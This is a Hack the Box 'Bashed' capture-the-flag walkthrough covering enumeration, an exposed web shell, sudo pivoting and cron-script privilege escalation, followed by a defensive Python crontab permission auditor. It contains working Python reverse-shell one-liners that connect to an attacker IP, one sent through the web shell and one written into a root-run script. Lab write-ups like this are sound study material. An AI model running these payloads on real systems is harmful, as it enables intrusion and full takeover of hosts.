Hack the Box - Bashed - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Bashed machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Bashed machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.98.229.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.98.229


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -T4 -sV -p80 10.129.98.229


Seeing that we only have an Apache server port open on the target, we enumerate the web directories using Gobuster:

gobuster dir -u http://10.129.98.229/ -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,html -s 200,204,301,302,307,403,401



The /dev directory looks suspicious, so let's check it out in our web browser:

http://10.129.98.229/dev/


And let's take a look at phpbash.php:

http://10.129.98.229/dev/phpbash.php



It looks like this web app essentially gives us a web shell. Let's test it out by checking the host's version info:

uname -a


Capturing the User Flag

Because we essentially have an interactive web shell at this point, we can capture the system's User flag now. User flag files on Hack the Box Linux systems are usually located in a user's /home directory. In this case, it's in the /home/arrexel directory:

cat /home/arrexel/user.txt


Finding a Way In

I think we can definitely get a reverse shell connection through this web page, but let's check to see if Python is on the system for a potential method of getting our shell:

which python


This confirms we can use Python to open a reverse shell. Before we do that, we need to start our Netcat listener on our attacking system:

sudo nc -nlvp 443


And now to send the Python command through the webpage:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.99.99",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

whoami




Foothold Enumeration

Let's see what our user can do:

sudo -l


It looks like our user can switch to the scriptmanager user without supplying a password. Let's try that:

sudo -u scriptmanager /bin/bash
whoami
python -c 'import pty; pty.spawn("/bin/bash")'


So we're the scriptmanager user now, and we've used python to upgrade our shell. Why do we want to be the scriptmanager user? Let's check which files this user owns.

find / -user scriptmanager -type f 2>/dev/null


Scripts. Scheduled job scripts are a classic privilege escalation technique, so let's check out that test.py file.

cat /scripts/test.py


The script creates the test.txt file, writes a string to it, then finishes. Let's take a look at the test.txt file:

ls -la /scripts


Privilege Escalation

One thing that sticks out about test.txt is that it was created by root. In addition, the file was created very recently. That leads us to conclude that the test.py script is being run very frequently, and is run as the root user. Since our current user owns the test.py script, we can modify the script to open a reverse shell back to our attacking system with Python commands.

Before we modify the test.py script, let's set up another Netcat listener on our attacking system to catch our root shell:

sudo nc -nlvp 80


And now to overwrite the contents of test.py with our reverse shell python script:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.99.99",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /scripts/test.py


We wait a minute for the scheduled script to run, then:

whoami


Capturing the Root Flag

Root flags on Hack the Box Linux systems are usually in the /root directory, so let's capture it now:

cat /root/root.txt


Summary

After initial scans, we found that there was a web app on the target's web server which allowed command injection on the web host, which we utilized to obtain a foothold into the system. Once inside the target, we found that there was a frequently-run scheduled command running as the root user that was linked to a script file that our low-privileged user could edit. We edited the script file, which allowed us to open a root shell on the target and obtain the objective flag files.
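The root cron job on Bashed executes a script owned by a low-privileged user, which is the misconfiguration a hardening review should catch before an attacker does. The following is an added audit example (not code from the walkthrough or from the box) that checks each existing file referenced by a crontab line for a non-root owner, group/other write bits, and a writable parent directory; the crontab line and script path in the `__main__` section are constructed, since the walkthrough never shows the actual cron entry.

```python
import os
import shlex
import stat


def modifiable_by_untrusted(st: os.stat_result, trusted_uid: int) -> bool:
    """True if some uid other than trusted_uid could change the object with these bits.
    A non-trusted owner can always edit or chmod it; otherwise check group/other write."""
    if st.st_uid != trusted_uid:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_line(line: str, trusted_uid: int = 0) -> list:
    """Audit one line of a crontab whose jobs run as trusted_uid (root by default).
    Assumed format: 'min hour dom mon dow command ...'. Every absolute path in the
    command that is an existing regular file is checked, together with its directory."""
    if line.lstrip().startswith("#"):
        return []
    fields = line.split(None, 5)
    if len(fields) < 6:
        return []
    findings = []
    for tok in shlex.split(fields[5]):
        # Only inspect absolute paths to regular files; skips interpreters on PATH
        # and device files such as /dev/null, which would otherwise be false positives.
        if not os.path.isabs(tok) or not os.path.isfile(tok):
            continue
        st = os.stat(tok)
        if modifiable_by_untrusted(st, trusted_uid):
            findings.append(f"{tok}: writable by uid {st.st_uid}, mode {oct(st.st_mode & 0o777)}")
        parent = os.path.dirname(tok)
        pst = os.stat(parent)
        # A writable parent directory lets a user replace the file even when the file
        # itself is locked down; the sticky bit blocks that rename/unlink, so it is exempt.
        if modifiable_by_untrusted(pst, trusted_uid) and not pst.st_mode & stat.S_ISVTX:
            findings.append(f"{parent}: directory writable, script can be replaced")
    return findings


if __name__ == "__main__":
    # Constructed crontab line in the shape of the Bashed job (not taken from the box).
    for finding in audit_cron_line("* * * * * python /scripts/test.py"):
        print(finding)
```

Run it against the output of `crontab -l` for root (and the files under /etc/cron.d) on a host you administer; an empty result for every line means no job executes a script that a lower-privileged account can alter.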

Finish
